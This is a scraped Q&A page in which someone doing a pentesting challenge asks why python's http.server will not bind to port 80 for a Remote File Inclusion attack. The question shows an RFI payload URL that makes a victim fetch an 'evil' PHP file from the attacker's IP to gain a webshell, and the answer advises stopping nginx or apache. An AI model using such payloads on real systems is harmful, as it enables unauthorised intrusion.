stackoom
  简体   繁体   中英

python http.server module not working over port 80 in Remote File Inclusion exercise

 原文  2020-03-28 19:26:49       python/ python-3.x/ simplehttpserver/ remote-file-inclusion

Question

I am doing a pentesting challenge and I am working on one machine that requires gaining access through a Remote File Inclusion vulnerability. In the past I was able to get a webshell by including a malicious file on my machine. I did so using the python http.server modules (sudo python3 -m http.server 80) and this worked absolutely fine. However, after the first time of doing so successfully, I have attempted to run this command again and every time I do I get the following error:

File "/usr/lib/python3.7/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/usr/lib/python3.7/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.7/http/server.py", line 1262, in <module>
test(HandlerClass=handler_class, port=args.port, bind=args.bind)
File "/usr/lib/python3.7/http/server.py", line 1230, in test
with ServerClass(server_address, HandlerClass) as httpd:
File "/usr/lib/python3.7/socketserver.py", line 452, in __init__
self.server_bind()
File "/usr/lib/python3.7/http/server.py", line 137, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.7/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use

This appears to be telling me that something is already using port 80 however when I close web browsers, check using lsof -i :80, even restart my machine it still never works. I have also attempted to include the file over a different port ( http://VICTIMIP/path/to/file.php?vuln_param=http://MYIP:4444/path/to/evil/file.php ) but this doesn't work. Can anybody give any advice on how to move forward? Either on why the http-server wouldn't be working on port 80 ever or why an RFI would only work over port 80? I can't really think of anything else I can try at this point.

1 answers

solution1
 0  2020-03-31 09:32:57

I guess you are using Kali Linux or something like that. It contains apache/nginx preinstalled, so try following before using python http server:

systemctl stop nginx
systemctl stop apache

(requires root)

Port is clearly in use, so it can help if nginx or apache is installed.

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question python -m http.server is not working for POST setting a public web server by python3 http.server module Python 3 and http.server usage Python http.server CGI do_POST not working on http.server with python Python3 http.server : save log to a file Python http.server Create Multiple Instances Python http.server 2 instances and 2 folders windows python http.server can not be reached Run public python http.server on Plesk
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM